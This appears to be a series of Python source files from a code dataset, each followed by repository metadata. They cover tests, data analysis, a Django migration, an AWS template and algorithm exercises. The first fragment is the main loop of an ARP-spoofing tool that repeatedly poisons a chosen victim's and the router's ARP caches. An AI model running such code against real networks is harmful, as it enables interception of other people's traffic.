print str(num) + " IP: " + host["ip"] + " MAC: " + host["mac"]
num += 1
host_id = raw_input("Enter the host ID to attack: ")
victim_ip = all_hosts[host_id]["ip"]
victim_mac = all_hosts[host_id]["mac"]
addr = get_local_network_addr()
router_ip = addr["ip"].replace("(", "").replace(")", "")
router_mac = addr["mac"].upper()
print "Router - IP: " + router_ip + " MAC: " + router_mac
print "Victim - IP: " + victim_ip + " MAC: " + victim_mac
while True:
try:
attack(victim_ip, victim_mac, router_ip, router_mac)
time.sleep(1.5)
except KeyboardInterrupt:
reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface)
break
sys.exit(1)
|
[
"[email protected]"
] | |
26bc1342180ebbe498f0c43171c93b41246741b6
|
8f4c691f190a1d4ffd4261ea6dca6a2d3a96284c
|
/csa/csa/doctype/coach/test_coach.py
|
0237f9215f3d3c946814d85ca059dd549fb3f4eb
|
[
"MIT"
] |
permissive
|
Jishnu70055/usermanagement
|
57abb738160fb213acdc2c71b40244eae4b06cee
|
f7b526335c2b99899afac188696071fa35df09ca
|
refs/heads/master
| 2023-09-03T17:30:50.147750 | 2021-10-21T13:27:38 | 2021-10-21T13:27:38 | 399,362,509 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 135 |
py
|
# Copyright (c) 2021, s and Contributors
# See license.txt
# import frappe
import unittest
class TestCoach(unittest.TestCase):
pass
|
[
"[email protected]"
] | |
b2253842a0e9b8288ac8ee0d30df524f7b9ba0b0
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/045_functions/011_function_introspection/_exercises/inspect — Inspect Live Objects/017_inspect_getclasstree_unique.py
|
ebbf5718b636badc01d294b99ee8331e6cc56fb7
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 159 |
py
|
# ______ i....
# ______ example
# f... inspect_getclasstree _______ 0
#
# print_class_tree(i___.getclasstree(
# |ex___.A ex____.B C D|
# u..._T...
# ))
|
[
"[email protected]"
] | |
fbe3f086830981b67b0ff4d35dbfd848f1e762ad
|
9c4828f1caf252c49c16ee7c5d73353f7b820785
|
/EducationaldataofBD/venv/main.py
|
7ab1dbbc43bcb8d95d50371d680f2e2c8d018812
|
[] |
no_license
|
pronob1010/Data_Science_Project_with_Edu_data
|
44459dd3d27f5fcba4f7a810671fe0e2e481b6c1
|
a4c6d1ac430f332eff5435318c86e82e70e7d765
|
refs/heads/master
| 2022-12-26T12:08:59.221010 | 2020-10-08T15:14:43 | 2020-10-08T15:14:43 | 298,825,261 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,142 |
py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import csv
country = pd.read_csv('C:\\Users\\prono\\PycharmProjects\\EducationaldataofBD\\venv\\dataset1.csv')
df = country.head(5900)
df = df.set_index(["EIIN"])
sd = df.reindex(columns=['DIVISION','INSTITUTE_TYPE','DISTRICT'])
print(sd)
print("----------------------------------------------------------------")
print("INSTITUTE_TYPE")
print("----------------------------------------------------------------")
INSTITUTE_TYPE = pd.value_counts(country['INSTITUTE_TYPE'])
print(INSTITUTE_TYPE)
print("----------------------------------------------------------------")
print("DIVISION")
print("----------------------------------------------------------------")
DIVISION = pd.value_counts(country['DIVISION'])
print(DIVISION)
print("----------------------------------------------------------------")
print("THANA")
print("----------------------------------------------------------------")
THANA = pd.value_counts(country['THANA'])
print(THANA)
print("----------------------------------------------------------------")
print("AREA_STATUS")
print("----------------------------------------------------------------")
AREA_STATUS = pd.value_counts(country['AREA_STATUS'])
print(AREA_STATUS)
print("----------------------------------------------------------------")
print("MPO_STATUS")
print("----------------------------------------------------------------")
MPO_STATUS= pd.value_counts(country['MPO_STATUS'])
print(MPO_STATUS)
print("----------------------------------------------------------------")
print("EDUCATION_LEVEL")
print("----------------------------------------------------------------")
EDUCATION_LEVEL = pd.value_counts(country['EDUCATION_LEVEL'])
print(EDUCATION_LEVEL)
print("----------------------------------------------------------------")
print("MANAGEMENT_TYPE")
print("----------------------------------------------------------------")
MANAGEMENT_TYPE = pd.value_counts(country['MANAGEMENT_TYPE'])
print(MANAGEMENT_TYPE)
print("-------------------------------------------------------------------------------------------------------------------------")
|
[
"[email protected]"
] | |
106d49eb14aff65452fe4cd74937e87eeea8b07e
|
e23a4f57ce5474d468258e5e63b9e23fb6011188
|
/115_testing/examples/Github/_Level_1/unittest-testsuite-example-master/app/foo_tests.py
|
d884126e6c468ffaf2c16c987e6331bddcc6897e
|
[] |
no_license
|
syurskyi/Python_Topics
|
52851ecce000cb751a3b986408efe32f0b4c0835
|
be331826b490b73f0a176e6abed86ef68ff2dd2b
|
refs/heads/master
| 2023-06-08T19:29:16.214395 | 2023-05-29T17:09:11 | 2023-05-29T17:09:11 | 220,583,118 | 3 | 2 | null | 2023-02-16T03:08:10 | 2019-11-09T02:58:47 |
Python
|
UTF-8
|
Python
| false | false | 268 |
py
|
# -*- coding: utf-8 -*-
import unittest
import foo
class TestFoo(unittest.TestCase):
def setUp(self):
self.FOO = foo.Foo()
def test_foo(self):
self.assertEqual(self.FOO.foo(),'foo')
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
ef7be56fb5d9456857d6f97b035f6216b0f4c322
|
6f8906230f03d4d3616e7ad04d7a54c2e55fb3e8
|
/profiles/migrations/0007_auto_20210201_1849.py
|
e1dc6a7fbb5379afc379eedc29eeb1f079b92e0b
|
[] |
no_license
|
sanidhyaagrawal/tergum-shared
|
8c45d95cb3510dc72f787c92fef4951c341ccc4c
|
8ab3a527fcc6c400ca1e11d93353afea466366c7
|
refs/heads/main
| 2023-05-09T14:46:46.185172 | 2021-06-02T15:15:13 | 2021-06-02T15:15:13 | 342,639,772 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
# Generated by Django 3.0.8 on 2021-02-01 13:19
from django.db import migrations, models
import profiles.models
class Migration(migrations.Migration):
dependencies = [
('profiles', '0006_auto_20210127_2212'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='image',
field=models.ImageField(blank=True, default='E:\\WORK\\tergum-shared-master\\0131\\tergum-shared-master\\tergum-shared-master\\staticfiles+base\\images\\profile_placeholder.png', upload_to=profiles.models.image_file_name),
),
]
|
[
"[email protected]"
] | |
911a983b38870d5b30029913df017ccfc099817a
|
549d8be84d27a1d6890c8539a519e58bd355351d
|
/examples/Serverless_Api_Backend.py
|
a0a2afbb3626a21ea3f17b0f3d8c9aa196248301
|
[
"BSD-2-Clause",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
anoora17/troposphere
|
1dabd3b4da89c593444c1564ef13fdae6e61acff
|
47db869b2875b9517df5fdd90d5e15505a555b09
|
refs/heads/master
| 2020-03-17T23:32:55.048454 | 2018-05-17T17:24:39 | 2018-05-17T17:24:39 | 134,050,719 | 1 | 0 |
BSD-2-Clause
| 2018-05-19T10:05:51 | 2018-05-19T10:05:51 | null |
UTF-8
|
Python
| false | false | 2,212 |
py
|
# Converted from api_backend located at:
# https://github.com/awslabs/serverless-application-model/blob/dbc54b5d0cd31bf5cebd16d765b74aee9eb34641/examples/2016-10-31/api_backend/template.yaml
from troposphere import Template, Ref
from troposphere.awslambda import Environment
from troposphere.serverless import Function, ApiEvent, SimpleTable
t = Template()
t.add_description(
"Simple CRUD webservice. State is stored in a SimpleTable (DynamoDB) "
"resource.")
t.add_transform('AWS::Serverless-2016-10-31')
simple_table = t.add_resource(
SimpleTable("Table")
)
t.add_resource(
Function(
"GetFunction",
Handler='index.get',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'GetResource': ApiEvent(
'GetResource',
Path='/resource/{resourceId}',
Method='get'
)
}
)
)
t.add_resource(
Function(
"PutFunction",
Handler='index.put',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'PutResource': ApiEvent(
'PutResource',
Path='/resource/{resourceId}',
Method='put'
)
}
)
)
t.add_resource(
Function(
"DeleteFunction",
Handler='index.delete',
Runtime='nodejs4.3',
CodeUri='s3://<bucket>/api_backend.zip',
Policies='AmazonDynamoDBReadOnlyAccess',
Environment=Environment(
Variables={
'TABLE_NAME': Ref(simple_table)
}
),
Events={
'DeleteResource': ApiEvent(
'DeleteResource',
Path='/resource/{resourceId}',
Method='delete'
)
}
)
)
print(t.to_json())
|
[
"[email protected]"
] | |
b146a8d58b6c44b8b91c6e10e0eee5d3ae1c1e03
|
365967082720f3fda31afccfc237b7a67e8ffc07
|
/sorting_searching/peak.py
|
dd2d896b427e16191838c3197c5819483f3b6557
|
[] |
no_license
|
hulaba/geekInsideYou
|
ec68dee3fa24d63f5470aa40b600ef34d37c5da1
|
72c1f1b4fbf115db91c908a68c9ac3ca4cb22a4f
|
refs/heads/master
| 2022-12-11T11:11:03.149336 | 2020-09-12T16:12:40 | 2020-09-12T16:12:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,363 |
py
|
# your task is to complete this function
# function should return index to the any valid peak element
def peakElement(arr, n):
# Code here
    if n == 1:
return 0
for i in range(n):
# if element at first index is greater than next
if i == 0 and arr[1] < arr[0]:
return 0
# if element is at last index and it is greater than
# its prev one
elif i == n - 1 and arr[n - 2] < arr[n - 1]:
return n - 1
# case, when element is at any other index
# then you need to check both of its neighbour
elif arr[i - 1] < arr[i] and arr[i] > arr[i + 1]:
return i
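# Example: peakElement([1, 3, 2], 3) returns 1, since 3 exceeds both neighbours.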
# {
# Driver Code Starts
if __name__ == '__main__':
t = int(input())
for i in range(t):
n = int(input())
arr = list(map(int, input().strip().split()))
index = peakElement(arr, n)
flag = False
if index == 0 and n == 1:
flag = True
elif index == 0 and arr[index] >= arr[index + 1]:
flag = True
elif index == n - 1 and arr[index] >= arr[index - 1]:
flag = True
elif arr[index - 1] <= arr[index] and arr[index] >= arr[index + 1]:
flag = True
else:
flag = False
if flag:
print(1)
else:
print(0)
# } Driver Code Ends
|
[
"[email protected]"
] | |
5cad52e17f840954f11e4f3480533211c904549e
|
956cc6ff2b58a69292f7d1223461bc9c2b9ea6f1
|
/monk/system_unit_tests/pytorch/test_activation_softmin.py
|
cde9b1d95f3da0fc6c01dd83ce0386fe8fc78a97
|
[
"Apache-2.0"
] |
permissive
|
Aanisha/monk_v1
|
c24279b2b461df9b3de2984bae0e2583aba48143
|
c9e89b2bc0c1dbb320aa6da5cba0aa1c1526ad72
|
refs/heads/master
| 2022-12-29T00:37:15.320129 | 2020-10-18T09:12:13 | 2020-10-18T09:12:13 | 286,278,278 | 0 | 0 |
Apache-2.0
| 2020-08-09T16:51:02 | 2020-08-09T16:51:02 | null |
UTF-8
|
Python
| false | false | 1,348 |
py
|
import os
import sys
sys.path.append("../../../../monk_v1/");
sys.path.append("../../../monk/");
import psutil
from pytorch_prototype import prototype
from compare_prototype import compare
from common import print_start
from common import print_status
import torch
import numpy as np
from pytorch.losses.return_loss import load_loss
def test_activation_softmin(system_dict):
forward = True;
test = "test_activation_softmin";
system_dict["total_tests"] += 1;
print_start(test, system_dict["total_tests"])
if(forward):
try:
gtf = prototype(verbose=0);
gtf.Prototype("sample-project-1", "sample-experiment-1");
network = [];
network.append(gtf.softmin());
gtf.Compile_Network(network, data_shape=(3, 64, 64), use_gpu=False);
x = torch.randn(1, 3, 64, 64);
y = gtf.system_dict["local"]["model"](x);
system_dict["successful_tests"] += 1;
print_status("Pass");
except Exception as e:
system_dict["failed_tests_exceptions"].append(e);
system_dict["failed_tests_lists"].append(test);
forward = False;
print_status("Fail");
else:
system_dict["skipped_tests_lists"].append(test);
print_status("Skipped");
return system_dict
|
[
"[email protected]"
] | |
45d620d1e60cd162a992f66503976015885c17a8
|
60cbdf1f9771159f872e632017fa736800784297
|
/Leetcode/Check-if-the-Sentence-is-Pangram.py
|
fe3da8ce862e017efe6b6dd38769acb3b97e5a82
|
[] |
no_license
|
AG-Systems/programming-problems
|
6ea8c109f04c4d22db6e63fe7b665894c786242a
|
39b2d3546d62b48388788e36316224e15a52d656
|
refs/heads/master
| 2023-04-16T16:59:20.595993 | 2023-04-05T01:25:23 | 2023-04-05T01:25:23 | 77,095,208 | 10 | 3 | null | 2019-10-14T16:16:18 | 2016-12-22T00:03:14 |
Python
|
UTF-8
|
Python
| false | false | 332 |
py
|
class Solution:
def checkIfPangram(self, sentence: str) -> bool:
letter_counter = {}
for letter in sentence:
if letter in letter_counter:
letter_counter[letter] += 1
else:
letter_counter[letter] = 1
return len(letter_counter.keys()) == 26
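# Example (assuming, per the problem constraints, the input contains only
# lowercase English letters, which the character count above relies on):
# Solution().checkIfPangram("thequickbrownfoxjumpsoverthelazydog")  # -> True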
|
[
"[email protected]"
] | |
0ae5585fb9e152b45e4cc381b1aea2c6b8c650fe
|
18b250fe572223ade49c2cf995e0aad0613abc6a
|
/scripts/artifacts/vlcThumbs.py
|
5a1156c12cdf50a0855a63068213cc7f249375c2
|
[
"MIT"
] |
permissive
|
ydkhatri/ALEAPP
|
e79e558005bf92519e45b17be99ad13aabf4f25e
|
4f2a739d6accd832176cac8db72cded07fb17633
|
refs/heads/master
| 2022-08-19T07:14:59.669286 | 2022-07-26T03:09:16 | 2022-07-26T03:09:16 | 242,858,450 | 0 | 0 |
MIT
| 2021-03-19T16:09:59 | 2020-02-24T22:33:34 |
JavaScript
|
UTF-8
|
Python
| false | false | 1,337 |
py
|
import os
import shutil
from scripts.artifact_report import ArtifactHtmlReport
from scripts.ilapfuncs import timeline, tsv, is_platform_windows, open_sqlite_db_readonly
def get_vlcThumbs(files_found, report_folder, seeker, wrap_text):
data_list = []
for file_found in files_found:
file_found = str(file_found)
data_file_real_path = file_found
shutil.copy2(data_file_real_path, report_folder)
data_file_name = os.path.basename(data_file_real_path)
thumb = f'<img src="{report_folder}/{data_file_name}"></img>'
data_list.append((data_file_name, thumb))
path_to_files = os.path.dirname(data_file_real_path)
description = 'VLC Thumbnails'
report = ArtifactHtmlReport('VLC Thumbnails')
report.start_artifact_report(report_folder, 'VLC Thumbnails', description)
report.add_script()
data_headers = ('Filename', 'Thumbnail' )
report.write_artifact_data_table(data_headers, data_list, path_to_files, html_escape=False)
report.end_artifact_report()
tsvname = 'VLC Thumbnails'
tsv(report_folder, data_headers, data_list, tsvname)
__artifacts__ = {
"VLC Thumbs": (
"VLC",
('*/org.videolan.vlc/files/medialib/*.jpg'),
get_vlcThumbs)
}
|
[
"[email protected]"
] | |
9af56f4a07be6988eb257460a4bda61c2d12b231
|
abf3ea33a5fa7457d1cd735310700df9c784d1ae
|
/CST100/Chapter_4/Chapter_4/Ch_4_Solutions/Ch_4_Projects/4.11/testnode.py
|
fbe1aafaeffff3f7a79626078998ce6c7db6794c
|
[] |
no_license
|
hieugomeister/ASU
|
57b8a2f604a27ce339675f40d3b042ccf57efb86
|
3e9254cebeaeb1c57ae912d6e5a02af7531128e8
|
refs/heads/master
| 2020-12-30T16:59:17.801581 | 2017-05-12T22:44:44 | 2017-05-12T22:44:44 | 91,046,525 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,934 |
py
|
"""
File: testnode.py
Project 4.11
Add a makeTwoWay function.
Tests the Node class.
"""
from node import Node, TwoWayNode
def length(head):
"""Returns the number of items in the linked structure
referred to by head."""
probe = head
count = 0
while probe != None:
count += 1
probe = probe.next
return count
def insert(index, newItem, head):
"""Inserts newItem at position is the linked structure
referred to by head. Returns a reference to the new
structure."""
if index <= 0:
# newItem goes at the head
head = Node(newItem, head)
else:
# Search for node at position index - 1 or the last position
probe = head
while index > 1 and probe.next != None:
            probe = probe.next
index -= 1
# Insert new node after node at position index - 1
# or last position
probe.next = Node(newItem, probe.next)
return head
def pop(index, head):
"""Removes the item at index from the linked structure
referred to by head and returns the tuple (head, item)
Precondition: 0 <= index < length(head)"""
if index < 0 or index >= length(head):
        raise IndexError("Index out of bounds")
# Assumes that the linked structure has at least one item
if index == 0:
removedItem = head.data
head = head.next
else:
# Search for node at position index - 1 or
# the next to last position
probe = head
while index > 1 and probe.next.next != None:
probe = probe.next
index -= 1
removedItem = probe.next.data
probe.next = probe.next.next
return (head, removedItem)
def makeTwoWay(head):
"""Creates and returns a doubly linked structure that
contains the items in the structure referred to by head."""
if head is None:
# Empty structure
return None
else:
# Set the first node
twoWayHead = TwoWayNode(head.data)
twoWayProbe = twoWayHead
probe = head
# Set remaining nodes, if any
while probe.next != None:
newNode = TwoWayNode(probe.next.data, twoWayProbe)
twoWayProbe.next = newNode
twoWayProbe = newNode
probe = probe.next
return twoWayHead
def printStructure(head):
"""Prints the items in the structure referred to by head."""
probe = head
while probe != None:
print(probe.data, end = " ")
probe = probe.next
print()
def main():
"""Tests modifications."""
head = None
# Add five nodes to the beginning of the linked structure
for count in range(1, 6):
head = Node(count, head)
print("5 4 3 2 1:", end = " ")
printStructure(head)
print("5 4 3 2 1:", end = " ")
twoWayHead = makeTwoWay(head)
printStructure(twoWayHead)
if __name__ == "__main__": main()
|
[
"[email protected]"
] | |
c3403fa8e1e383b59e7d439c6a8cb4257c367515
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/224/users/4466/codes/1734_2506.py
|
7e3f3e2a8fa3a6b63bd10bd541c82d212da44969
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109 | 2020-05-23T00:24:26 | 2020-05-23T00:24:26 | 266,199,309 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 372 |
py
|
q_inicial = int(input("quantidade inicial: "))
perc = float(input("percentual de crescimento: "))
quant = int(input("quantidade de pirarucus retirados: "))
perc = perc/100
t = 0
while(0 <= q_inicial <= 12000):
q_inicial = (q_inicial + q_inicial * perc) - quant
t = t + 1
if(q_inicial <= 0):
print("EXTINCAO")
print(t)
if(q_inicial >= 12000):
print("LIMITE")
print(t)
|
[
"[email protected]"
] | |
eb93813e0136a34f5b51222dd6b5c3141c7b1d1c
|
eb280992ab7c39173f6f19d28ddf7efd8a29775a
|
/calaccess_processed_elections/apps.py
|
b93b394463300e21fac2cb0fa5fcc3069b0c68f6
|
[
"MIT"
] |
permissive
|
ryanvmenezes/django-calaccess-processed-data
|
f5e99a8bdaf7c6555e357d3dabfd673fd12b8419
|
966635c8438cda440a12f7765af7c79b5bcb3995
|
refs/heads/master
| 2020-04-14T22:41:49.520588 | 2018-10-10T12:07:57 | 2018-10-10T12:07:57 | 99,171,493 | 0 | 0 | null | 2017-08-03T00:02:03 | 2017-08-03T00:02:03 | null |
UTF-8
|
Python
| false | false | 3,720 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Basic configuration for the application.
"""
from __future__ import unicode_literals, absolute_import
import os
import collections
from django.apps import apps
from django.apps import AppConfig
class CalAccessProcessedElectionsConfig(AppConfig):
"""
Application configuration.
"""
name = 'calaccess_processed_elections'
verbose_name = "CAL-ACCESS processed data: Elections"
# Where SQL files are stored in this application
sql_directory_path = os.path.join(os.path.dirname(__file__), 'sql')
def get_ocd_models_list(self):
"""
Returns a list of all the OCD models proxied by this app.
"""
return list(self.get_ocd_models_map().keys())
def get_ocd_proxy_lookup(self):
"""
Returns a dictionary with the names of data models mapped to proxies.
"""
# Convert the keys to strings
return dict((k.__name__, v) for k, v in self.get_ocd_models_map().items())
def get_ocd_models_map(self):
"""
        Returns an ordered mapping of the models that should be archived to their proxies.
"""
from . import proxies
ocd_core = apps.get_app_config('core')
ocd_elections = apps.get_app_config('elections')
# Create a dict mapping the models to proxies
return collections.OrderedDict({
ocd_core.get_model('Division'): proxies.OCDDivisionProxy,
ocd_core.get_model('Organization'): proxies.OCDOrganizationProxy,
ocd_core.get_model('OrganizationIdentifier'): proxies.OCDOrganizationIdentifierProxy,
ocd_core.get_model('OrganizationName'): proxies.OCDOrganizationNameProxy,
ocd_core.get_model('Jurisdiction'): proxies.OCDJurisdictionProxy,
ocd_core.get_model('Post'): proxies.OCDPostProxy,
ocd_core.get_model('Person'): proxies.OCDPersonProxy,
ocd_core.get_model('PersonIdentifier'): proxies.OCDPersonIdentifierProxy,
ocd_core.get_model('PersonName'): proxies.OCDPersonNameProxy,
ocd_core.get_model('Membership'): proxies.OCDMembershipProxy,
ocd_elections.get_model('Election'): proxies.OCDElectionProxy,
ocd_elections.get_model('ElectionIdentifier'): proxies.OCDElectionIdentifierProxy,
ocd_elections.get_model('ElectionSource'): proxies.OCDElectionSourceProxy,
ocd_elections.get_model('Candidacy'): proxies.OCDCandidacyProxy,
ocd_elections.get_model('CandidacySource'): proxies.OCDCandidacySourceProxy,
ocd_elections.get_model('BallotMeasureContest'): proxies.OCDBallotMeasureContestProxy,
ocd_elections.get_model('BallotMeasureContestOption'): proxies.OCDBallotMeasureContestOptionProxy,
ocd_elections.get_model('BallotMeasureContestIdentifier'): proxies.OCDBallotMeasureContestIdentifierProxy,
ocd_elections.get_model('BallotMeasureContestSource'): proxies.OCDBallotMeasureContestSourceProxy,
ocd_elections.get_model('RetentionContest'): proxies.OCDRetentionContestProxy,
ocd_elections.get_model('RetentionContestOption'): proxies.OCDRetentionContestOptionProxy,
ocd_elections.get_model('RetentionContestIdentifier'): proxies.OCDRetentionContestIdentifierProxy,
ocd_elections.get_model('RetentionContestSource'): proxies.OCDRetentionContestSourceProxy,
ocd_elections.get_model('CandidateContest'): proxies.OCDCandidateContestProxy,
ocd_elections.get_model('CandidateContestPost'): proxies.OCDCandidateContestPostProxy,
ocd_elections.get_model('CandidateContestSource'): proxies.OCDCandidateContestSourceProxy
})
|
[
"[email protected]"
] | |
4f54753f579ffb5420f90b1d8b8a3f5e105c7783
|
34652a47355a8dbe9200db229a1bbc62619de364
|
/Algorithms/eppstein/PartitionRefinement.py
|
25028f7afc76ad44dc47c9bfdac0723cd00e2448
|
[
"MIT"
] |
permissive
|
btrif/Python_dev_repo
|
df34ab7066eab662a5c11467d390e067ab5bf0f8
|
b4c81010a1476721cabc2621b17d92fead9314b4
|
refs/heads/master
| 2020-04-02T13:34:11.655162 | 2019-11-10T11:08:23 | 2019-11-10T11:08:23 | 154,487,015 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,119 |
py
|
"""PartitionRefinement.py
Maintain and refine a partition of a set of items into subsets,
as used e.g. in Hopcroft's DFA minimization algorithm,
modular decomposition of graphs, etc.
D. Eppstein, November 2003.
"""
class PartitionError(Exception): pass
class PartitionRefinement:
"""Maintain and refine a partition of a set of items into subsets.
Space usage for a partition of n items is O(n), and each refine
operation takes time proportional to the size of its argument.
"""
def __init__(self,items):
"""Create a new partition refinement data structure for the given
items. Initially, all items belong to the same subset.
"""
S = set(items)
self._sets = {id(S):S}
self._partition = {x:S for x in S}
def __getitem__(self,element):
"""Return the set that contains the given element."""
return self._partition[element]
def __iter__(self):
"""Loop through the sets in the partition."""
try: # Python 2/3 compatibility
return self._sets.itervalues()
except AttributeError:
return iter(self._sets.values())
def __len__(self):
"""Return the number of sets in the partition."""
return len(self._sets)
def add(self,element,theset):
"""Add a new element to the given partition subset."""
if id(theset) not in self._sets:
raise PartitionError("Set does not belong to the partition")
if element in self._partition:
raise PartitionError("Element already belongs to the partition")
theset.add(element)
self._partition[element] = theset
def remove(self,element):
"""Remove the given element from its partition subset."""
self._partition[element].remove(element)
del self._partition[element]
def refine(self,S):
"""Refine each set A in the partition to the two sets
A & S, A - S. Return a list of pairs (A & S, A - S)
for each changed set. Within each pair, A & S will be
a newly created set, while A - S will be a modified
version of an existing set in the partition.
Not a generator because we need to perform the partition
even if the caller doesn't iterate through the results.
"""
hit = {}
output = []
for x in S:
if x in self._partition:
Ax = self._partition[x]
hit.setdefault(id(Ax),set()).add(x)
for A,AS in hit.items():
A = self._sets[A]
if AS != A:
self._sets[id(AS)] = AS
for x in AS:
self._partition[x] = AS
A -= AS
output.append((AS,A))
return output
def freeze(self):
"""Make all sets in S immutable."""
for S in list(self._sets.values()):
F = frozenset(S)
for x in F:
self._partition[x] = F
self._sets[id(F)] = F
del self._sets[id(S)]
S = {1,4,9,16}
A = PartitionRefinement(S)
print(A.refine(S))
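# Illustrative sketch (not part of the original file): refining by a proper
# subset splits the single block {1, 4, 9, 16} into ({1, 4}, {9, 16}).
B = PartitionRefinement({1, 4, 9, 16})
print(B.refine({1, 4}))  # -> [({1, 4}, {9, 16})]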
|
[
"[email protected]"
] | |
3f9d7d0aaff42ecd58b1353b226c30457aefb554
|
2fba0a631bb70aaae6dc89bff09f13e728934605
|
/privacy/migrations/0022_auto_20200527_0909.py
|
2f9d37c178d9929cd0adc472a56bc0457b5f6116
|
[] |
no_license
|
murengera/eshoping-api
|
4c5bcbeb7ac3ef12858e08f8a88d4f7b710b5c64
|
90acb0f8db519a38a1bd0976bd1f704f6d02f2dd
|
refs/heads/master
| 2022-12-25T10:19:39.431427 | 2020-09-26T12:35:38 | 2020-09-26T12:35:38 | 286,399,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 724 |
py
|
# Generated by Django 3.0 on 2020-05-27 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('privacy', '0021_auto_20200527_0908'),
]
operations = [
migrations.AlterField(
model_name='privacypoliciesandtermsofuse',
name='_type',
field=models.CharField(choices=[('terms_of_use', 'terms_of_use'), ('privacy_policy', 'privacy_policy')], max_length=50),
),
migrations.AlterField(
model_name='privacypoliciesandtermsofuse',
name='language',
field=models.CharField(choices=[('english', 'english'), ('rwandese', 'rwandese')], max_length=30),
),
]
|
[
"[email protected]"
] | |
5b89414e459547981f97861a6da0ef73ea51b958
|
2db1a0038d26ccb6adc572b536cb5cd401fd7498
|
/lib/python2.7/site-packages/pip/commands/check.py
|
95c64fc66c74741bc3e23fd86868dac809cb4f94
|
[] |
no_license
|
syurk/labpin
|
e795c557e7d7bcd4ff449cb9a3de32959a8c4968
|
04070dd5ce6c0a32c9ed03765f4f2e39039db411
|
refs/heads/master
| 2022-12-12T02:23:54.975797 | 2018-11-29T16:03:26 | 2018-11-29T16:03:26 | 159,692,630 | 0 | 1 | null | 2022-11-19T12:15:55 | 2018-11-29T16:04:20 |
Python
|
UTF-8
|
Python
| false | false | 1,381 |
py
|
import logging
from pip.basecommand import Command
from pip.operations.check import check_requirements
from pip.utils import get_installed_distributions
logger = logging.getLogger(__name__)
class CheckCommand(Command):
"""Verify installed packages have compatible dependencies."""
name = 'check'
usage = """
%prog [options]"""
summary = 'Verify installed packages have compatible dependencies.'
def run(self, options, args):
dists = get_installed_distributions(local_only=False, skip=())
missing_reqs_dict, incompatible_reqs_dict = check_requirements(dists)
for dist in dists:
key = '%s==%s' % (dist.project_name, dist.version)
for requirement in missing_reqs_dict.get(key, []):
logger.info(
"%s %s requires %s, which is not installed.",
dist.project_name, dist.version, requirement.project_name)
for requirement, actual in incompatible_reqs_dict.get(key, []):
logger.info(
"%s %s has requirement %s, but you have %s %s.",
dist.project_name, dist.version, requirement,
actual.project_name, actual.version)
if missing_reqs_dict or incompatible_reqs_dict:
return 1
else:
logger.info("No broken requirements found.")
|
[
"[email protected]"
] | |
c59b76f55ddc99b1693010dc6662d175c45b7f65
|
69e41359e2f01ffb12e243970a59e6fcc986e09a
|
/solved/Euler56.py
|
87493072ac091de2dbfdf3fae52aa0ea07e77c2d
|
[] |
no_license
|
pfhayes/euler
|
0d4383f9cfa36890bdaf95bfdae553707c6cbc86
|
56f053afffb91262c7c48463700cab4fe6581813
|
refs/heads/master
| 2016-09-05T13:18:46.089574 | 2011-12-21T05:26:41 | 2011-12-21T05:26:41 | 1,786,274 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 281 |
py
|
# Find the maximum possible sum of digits for a^b, with a,b < 100
from useful import digits
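# `digits` lives in a local helper module not shown here; a minimal
# stand-in (an assumption, not the original) would be:
# def digits(n): return [int(c) for c in str(n)]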
maxA, maxB, maxSum = 0, 0, 0
for a in range(100):
    for b in range(100):
        s = sum(digits(a**b))
        if s > maxSum:
            maxSum, maxA, maxB = s, a, b
print(maxSum, maxA, maxB)
|
[
"[email protected]"
] | |
49445015f0ed16f52b4534b346d9f4cc8f0baa8b
|
91d1a6968b90d9d461e9a2ece12b465486e3ccc2
|
/ec2_read_1/client-vpn-connection_list.py
|
0a5a1dfa2928044398a0fafaa19dbe1a6072d131
|
[] |
no_license
|
lxtxl/aws_cli
|
c31fc994c9a4296d6bac851e680d5adbf7e93481
|
aaf35df1b7509abf5601d3f09ff1fece482facda
|
refs/heads/master
| 2023-02-06T09:00:33.088379 | 2020-12-27T13:38:45 | 2020-12-27T13:38:45 | 318,686,394 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,334 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sys
sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))
from common.execute_command import execute_one_parameter
# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/describe-client-vpn-connections.html
if __name__ == '__main__':
"""
